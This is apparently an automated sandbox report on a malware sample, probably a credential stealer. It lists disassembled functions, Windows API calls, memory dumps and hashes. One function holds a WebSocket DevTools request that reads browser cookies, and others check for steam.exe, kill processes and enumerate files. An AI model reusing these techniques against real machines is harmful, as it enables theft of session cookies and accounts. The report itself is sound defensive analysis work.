                                  Function 004048B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: b095056307cf7a035f1c587558d668d9ca07c08afe539e1b97bf930a69a579b3
                                  • Instruction ID: 935eca1e717faaa75f68978d1793f3a34eefa41e086fdca648adedb688856b61
                                  • Opcode Fuzzy Hash: b095056307cf7a035f1c587558d668d9ca07c08afe539e1b97bf930a69a579b3
                                  • Instruction Fuzzy Hash: 47A25971D012699FDB20DBA8C9807DEBBB6EF89300F1485BAD508B7281DB745E85CF94
                                  Function 003F23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F2402
                                  • lstrlen.KERNEL32(\*.*), ref: 003F240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003F2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: a323666cc5e92f8bf27de0a213263ea7b36fa68c638f03e36832580727f96140
                                  • Instruction ID: aefc93e312c8e172bf4a5565634452268e5a20296f19ac8d760bbeece88fb6cc
                                  • Opcode Fuzzy Hash: a323666cc5e92f8bf27de0a213263ea7b36fa68c638f03e36832580727f96140
                                  • Instruction Fuzzy Hash: 5A417331511269DBCB33EF26DC85BAF73A9AF14310F055235B9499B292CFB09D518B90
                                  Function 004046A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004046B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 004046C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004046DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 004046ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404711
                                  • CloseHandle.KERNEL32(00000000), ref: 00404718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00404726
                                  • CloseHandle.KERNEL32(00000000), ref: 00404731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 1f786905398b1a3126b2b0501058f4bff81ab66334525455657ecf574811fbed
                                  • Instruction ID: 554051e1088d0bfcd6e1e2d8abb223838bd3e88b852ebf3ad8b604d701d5f67c
                                  • Opcode Fuzzy Hash: 1f786905398b1a3126b2b0501058f4bff81ab66334525455657ecf574811fbed
                                  • Instruction Fuzzy Hash: 4001C4715011146FE7205B60DC8CFFB377DEB89B42F0840AAFA05E2180EF789A418B75
                                  Function 00404610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00404628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00404638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0040464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00404660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00404672
                                  • CloseHandle.KERNEL32(00000000), ref: 0040467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: 59c90945ce732de9c7dc40a40a20a3704bf9dcdb8f8451fb292aa9970096ad5e
                                  • Instruction ID: 0cd5f08c27e7e7d9f8fe33096373189fbba4e2c63058de6974d410d8f511383a
                                  • Opcode Fuzzy Hash: 59c90945ce732de9c7dc40a40a20a3704bf9dcdb8f8451fb292aa9970096ad5e
                                  • Instruction Fuzzy Hash: 360184715011149FD7209B609C48FEB77ADEB4D351F0441DBE908D1180EF788A948AE5
                                  Function 003F4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4B7F
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BA7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F4BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: 2d2de4fe67c4fa7b4a70671f2853a1e7591cc8664c554f77501159fb3442e7fb
                                  • Instruction ID: 7574940f24dbd8d0e9e733cc6e1065eb55a1f711a69440a5925dcf054d17fcb6
                                  • Opcode Fuzzy Hash: 2d2de4fe67c4fa7b4a70671f2853a1e7591cc8664c554f77501159fb3442e7fb
                                  • Instruction Fuzzy Hash: FB31603252116A9BC723EF25EC85EAF77B9AF40710F055235F9459B292DF70EC118BA0
                                  Function 00402D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00402D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00402DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00402DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00402DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00402FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: f41176629e42fad741279f84e911c6a5a3f99d7dc0d2f69678eb3334c3b0f33d
                                  • Instruction ID: 477d6e3ad603a3a45fa101c2fbc84d86889fd40af51783668a5b3157b83551c4
                                  • Opcode Fuzzy Hash: f41176629e42fad741279f84e911c6a5a3f99d7dc0d2f69678eb3334c3b0f33d
                                  • Instruction Fuzzy Hash: 0CB1F970900215CFD715CF14C948B96B7F6BB44319F29C1BAD408AB3E6D7BA9D82CB94
                                  Function 007A76E5 Relevance: 10.2, Strings: 7, Instructions: 1421COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 97$*:~$E"uo$[y?o$\vz$l:z$+s^
                                  • API String ID: 0-3902775800
                                  • Opcode ID: 7d95c5301378dc03be0597a0bcda4adab465089e41d57c64d3a7d1c1b106cf9e
                                  • Instruction ID: 0be1d6a4cd3a7e7605209d536ca7a9b11a323b32ad448c2da9ed581058cfe30c
                                  • Opcode Fuzzy Hash: 7d95c5301378dc03be0597a0bcda4adab465089e41d57c64d3a7d1c1b106cf9e
                                  • Instruction Fuzzy Hash: 44A2E7F360C2149FE304AE2DEC8567AF7E9EF94720F16893DEAC4C3744E63598058696
                                  Function 0079B7EC Relevance: 9.2, Strings: 6, Instructions: 1673COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !B;g$1o3$4:!$5v}$R=$_W~.
                                  • API String ID: 0-2269044248
                                  • Opcode ID: 5b6300f58dbe4618c5be1fe2509fd956022d0442861f5ed4d90c7f36e836905e
                                  • Instruction ID: c98256301d227f2e20093bac44434f8ce0f7f49cc9528f3c48b22b549a99d8f7
                                  • Opcode Fuzzy Hash: 5b6300f58dbe4618c5be1fe2509fd956022d0442861f5ed4d90c7f36e836905e
                                  • Instruction Fuzzy Hash: 8FB2F6F3A0C2049FE3046E29EC8567AF7E9EF94720F1A893DE6C4C7744E63598418796
                                  Function 007A8F3F Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7n$B{$7h;$:1/$Q/U:$cw
                                  • API String ID: 0-282054085
                                  • Opcode ID: 85b850807ad0a70f1bff2048c934934a47580b1dee828d66fee6ef6a3d63f8ca
                                  • Instruction ID: 71a0085a2d7a2fc3e0760d479b1d75aff67fc0a19be883c194d1037f77f51aec
                                  • Opcode Fuzzy Hash: 85b850807ad0a70f1bff2048c934934a47580b1dee828d66fee6ef6a3d63f8ca
                                  • Instruction Fuzzy Hash: 1BA2F3F3A0C2009FE304AE29EC8566AFBE5EF94720F1A493DEAC4C7744E63558058797
                                  Function 00402C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00402C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00402C58
                                  • wsprintfA.USER32 ref: 00402C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
